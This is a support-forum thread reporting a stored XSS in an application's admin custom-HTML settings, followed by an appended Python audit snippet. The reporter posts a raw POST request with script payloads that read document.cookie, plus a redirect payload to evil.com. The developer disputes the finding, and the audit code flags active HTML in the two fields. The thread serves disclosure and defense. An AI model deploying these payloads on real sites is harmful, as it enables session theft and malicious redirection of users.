Stored Cross-Site Scripting (XSS) in configuration/custom_html

Any critical bugs will be fixed within 24-48 hours.
Toxi4
Posts: 6
Joined: 08 Apr 2024, 14:31
Name: Anton Kartunov
Location: Russia

Stored Cross-Site Scripting (XSS) in configuration/custom_html

Post by Toxi4 »

Hey!

I found an XSS vulnerability in the configuration/custom_html module, in the functionality for adding custom HTML code via the CFG[CUSTOM_HTML_HEAD] and CFG[CUSTOM_HTML_BODY] parameters.

Payload: <script>alert('text'%2bdocument.cookie)</script>

Request:

Code:

POST /index.php?module=configuration/save&redirect_to=configuration/custom_html HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded
Cookie: [Cookie]

form_session_token=DGIbpSzqgS&CFG[CUSTOM_HTML_HEAD]=<script>alert('head'%2bdocument.cookie)</script>&CFG[CUSTOM_HTML_BODY]=<script>alert('body'%2bdocument.cookie)</script>

The payload can be triggered on any page, for all users.

Through this vulnerability, an attacker can steal the sessions of all users of the system or redirect them to the attacker's website. But to exploit this vulnerability, the attacker needs admin access.
support
Site Admin
Posts: 6215
Joined: 19 Oct 2014, 18:22
Name: Sergey Kharchishin
Location: Russia, Evpatoriya

Re: Stored Cross-Site Scripting (XSS) in configuration/custom_html

Post by support »

Anton, this is not a vulnerability. As an administrator you can add your own PHP/JS/HTML code for the app. This is not a bug or a vulnerability.
Toxi4
Posts: 6
Joined: 08 Apr 2024, 14:31
Name: Anton Kartunov
Location: Russia

Re: Stored Cross-Site Scripting (XSS) in configuration/custom_html

Post by Toxi4 »

I can't agree with you. Even if the application has functionality for adding HTML/PHP/JS code, it is still necessary to filter out potentially dangerous functions.

I don’t think that your users will be happy if they are redirected to a malicious site after logging in.

Code:

"/><script>location.replace("https://evil.com")</script>

Or if an unscrupulous administrator decides to steal the cookies of all users and log in to their personal accounts.
support
Site Admin
Posts: 6215
Joined: 19 Oct 2014, 18:22
Name: Sergey Kharchishin
Location: Russia, Evpatoriya

Re: Stored Cross-Site Scripting (XSS) in configuration/custom_html

Post by support »

But you are the admin, and the app allows you to add any code. It's all your responsibility.
It would be a vulnerability if a non-admin user could add something like this.
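Since the two custom HTML fields are rendered on every page for every user, an operator who keeps the feature enabled may want a review tripwire on changes to them. The following is an added example, not part of the thread and not the application's own code: it parses a form-encoded save request and lists active content in the two fields named in the report. The function and constant names are assumptions, and it is an audit aid, not a sanitizer.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Fields named in the report; their values are rendered on every page.
WATCHED = ("CFG[CUSTOM_HTML_HEAD]", "CFG[CUSTOM_HTML_BODY]")
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}
URL_ATTRS = {"href", "src", "action", "formaction"}


class ActiveContentFinder(HTMLParser):
    """Collects constructs that execute script or navigate the browser."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            value = (value or "").strip().lower()
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")
            elif name in URL_ATTRS and value.startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name}")
            elif tag == "meta" and name == "http-equiv" and value == "refresh":
                self.findings.append("meta refresh redirect")


def audit_config_post(body):
    """Return {field: [findings]} for watched fields in a form-encoded body."""
    report = {}
    form = parse_qs(body, keep_blank_values=True)
    for field in WATCHED:
        for value in form.get(field, []):
            finder = ActiveContentFinder()
            finder.feed(value)
            finder.close()
            if finder.findings:
                report.setdefault(field, []).extend(finder.findings)
    return report


# Request body as posted in the report above.
REPORTED = ("form_session_token=DGIbpSzqgS"
            "&CFG[CUSTOM_HTML_HEAD]=<script>alert('head'%2bdocument.cookie)</script>"
            "&CFG[CUSTOM_HTML_BODY]=<script>alert('body'%2bdocument.cookie)</script>")
# Constructed benign change for comparison.
BENIGN = ('CFG[CUSTOM_HTML_HEAD]=<meta name="robots" content="noindex">'
          '&CFG[CUSTOM_HTML_BODY]=<p class="note">Maintenance on Friday</p>')
```

A non-empty result is a reason for a second person to review the change, not proof of abuse. Marking the session cookie HttpOnly keeps script from reading it through document.cookie, but does not stop a redirect.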